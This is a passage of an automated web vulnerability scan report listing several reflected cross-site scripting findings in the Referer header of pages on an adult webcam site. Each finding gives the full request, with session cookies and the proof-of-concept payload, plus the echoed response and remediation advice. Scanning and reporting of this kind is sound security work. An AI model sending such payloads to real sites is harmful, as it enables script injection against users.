Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:34 GMT
Connection: close
Content-Length: 27209
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
cript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/&rf=http://www.google.com/search?hl=en^q=15c00'-alert(1)-'13ed03de9eb&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att
...[SNIP]...

2.209. http://imlive.com/live-sex-chats/cam-girls/hotspots/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/hotspots/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abdb3'-alert(1)-'17f2cec9909 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=abdb3'-alert(1)-'17f2cec9909

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:14 GMT
Connection: close
Content-Length: 40632
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=abdb3'-alert(1)-'17f2cec9909&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.210. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cams-aroundthehouse/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e389'-alert(1)-'41c0351c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=5e389'-alert(1)-'41c0351c2c2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:31 GMT
Connection: close
Content-Length: 33186
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/&rf=http://www.google.com/search?hl=en^q=5e389'-alert(1)-'41c0351c2c2&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.211. http://imlive.com/live-sex-chats/caught-on-cam/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/caught-on-cam/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9792b'-alert(1)-'ba39155c916 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/caught-on-cam/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=9792b'-alert(1)-'ba39155c916

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 25658
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
xt/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/&rf=http://www.google.com/search?hl=en^q=9792b'-alert(1)-'ba39155c916&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.212. http://imlive.com/live-sex-chats/couple/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67099'-alert(1)-'bb279cc6b57 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=67099'-alert(1)-'bb279cc6b57

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:29 GMT
Connection: close
Content-Length: 113880
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/&rf=http://www.google.com/search?hl=en^q=67099'-alert(1)-'bb279cc6b57&qs=cat=1^roomid=12&qs=cat=1^roomid=12&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.213. http://imlive.com/live-sex-chats/fetish/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8877f'-alert(1)-'f0d179f333a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=8877f'-alert(1)-'f0d179f333a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:07 GMT
Connection: close
Content-Length: 213457
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/&rf=http://www.google.com/search?hl=en^q=8877f'-alert(1)-'f0d179f333a&qs=cat=1^roomid=13&qs=cat=1^roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.214. http://imlive.com/live-sex-chats/fetish/categories/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/categories/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c608e'-alert(1)-'0606a3ceeb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=c608e'-alert(1)-'0606a3ceeb1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:36 GMT
Connection: close
Content-Length: 24548
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/&rf=http://www.google.com/search?hl=en^q=c608e'-alert(1)-'0606a3ceeb1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att
...[SNIP]...

2.215. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video-for-ipod/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bee'-alert(1)-'306a0aabfe1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=96bee'-alert(1)-'306a0aabfe1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 72576
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
